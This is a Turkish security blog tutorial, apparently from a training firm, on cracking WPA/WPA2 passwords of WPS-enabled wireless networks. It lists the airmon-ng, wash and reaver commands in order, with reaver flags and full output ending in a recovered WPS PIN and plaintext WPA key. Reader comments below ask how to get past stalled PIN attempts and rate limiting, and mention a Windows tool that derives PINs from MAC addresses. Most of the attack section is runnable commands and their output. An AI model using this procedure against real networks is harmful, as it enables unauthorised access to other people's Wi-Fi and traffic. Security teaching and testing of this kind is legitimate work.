WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak

 

WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.

Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.

Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.

Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)

WPS destekli kablosuz ağları bulmak için,

# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I

Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.

BSSID = 33:22:55:22:11:2F
CH = 9

# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.

Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

 

49 Yorum

  1. Qehreman d 16 Temmuz 2015 22:07

    Selam arkadaslar.Bende dahil olmak üzere bir çok arkadaş reaverin %99kalma sorunu yasiyor.Bunun sebebi wps pinler 8 haneden ikili grup halinde olusur reaver ilk 4 hanesini dogru tespit edemedigi icin %90 veye %99 kadar gidip ondan sonra hep ayni wps pini dener.
    Şuan ZyXEL marka bi modem kirmaya calisiorm fakat reaver 1.3 ve 1.4 de denedim yni sorunla karsilastim.
    Bunun çözümūnü bilen arkadaslar varsa lutfen yardim edin.

  2. Ali tuna 11 Haziran 2015 20:13

    airmon-ng start wlan0 komutundan sonra mon yazmıyor mon0 veya 1 ıse yaramıyor wlan0mon yazıyor

  3. fatih gül 2 Haziran 2015 10:27

    Ben bunları nasıl yapcam bi tane kırdı sadece

  4. Adsız 14 Mayıs 2015 07:48

    Reaver ile alınan ap rate limited sorunsalına çözüm teşkil edecek bir öneriniz var mıdır?

  5. bagcan baltacioglu 15 Şubat 2015 18:42

    Merhaba
    wash -i mon0 -C çalıştırdığımda ekrana tablo geliyor ancak içi boş. Herhangi bir wifi network yok. bunun sebebi nedir? ağ kartımın injection ı destekleyip desteklemediğini görmem için verdiğiniz link çalışmıyor. sanırım kaldırılmış içerik.

    ekrandaki çıktı şu şekilde kalıyor. ne yapmamı önerirsiniz? problem nedir sizce?

    # airmon-ng start wlan0

    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    779 avahi-daemon
    785 avahi-daemon
    856 NetworkManager
    1263 wpa_supplicant
    1553 dhclient
    Process with PID 1553 (dhclient) is running on interface wlan0

    Interface Chipset Driver

    wlan0 Intel 5100 iwlwifi – [phy0]
    (monitor mode enabled on mon0)

    root@MrWhoSys:/home/mrwho# wash -i mon0 -C

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    —————————————————————————————————————

  6. Diyar Toprak 7 Şubat 2015 15:08

    wsc nack bende de diyo

  7. bagcan baltacioglu 4 Şubat 2015 21:02

    Merhaba.
    Ben windows ortamda Dummper.exe ile RALink AP leri (RT2860) 5 – 10 saniye içerisinde kırıp networke dahil olabiliyorum. ancak diğer cihazlarda, chipsetlerde pek başarılı olduğu söylenemez. Webde biraz araştırdığımda dummper.exe nin pinleri saldırdığı cihazın mac adresinden hesapladığını, mac adreslerinden wps pinlerine ulaşılabildiğini okudum. dummper ı ilk çalıştırıp sinyalleri taradığınız anda bulduğu networkleri pinleri ile birlikte listeliyor. sizin bu konu hakkında bilginiz ve görüşleriniz nelerdir paylaşırmısınız? sizin görüşleriniz deneyimleriniz benim için oldukça değerli. İyi çalışmalar. 🙂

  8. Ömer Albayrak 24 Ocak 2015 11:48

    Benzer problem başkaları tarafından da yaşanmış, benim yorumumda ağ kartınızı, hedef ağa uzaklığınızı ve güncel reaver sürümünü denemeniz yönünde olur. Daha açık bir yorumum yok maalesef.

  9. ali mahmudov 23 Ocak 2015 13:24

    [+] Sending identity response

    bende bundan sora hic bisey gelmiyor neden??

  10. Ömer Albayrak 15 Ocak 2015 14:54

    Linux kurulu bir bilgisayara adresinden indirip kullanabilirsin.

Yorum Yaz

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

1 × one =

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.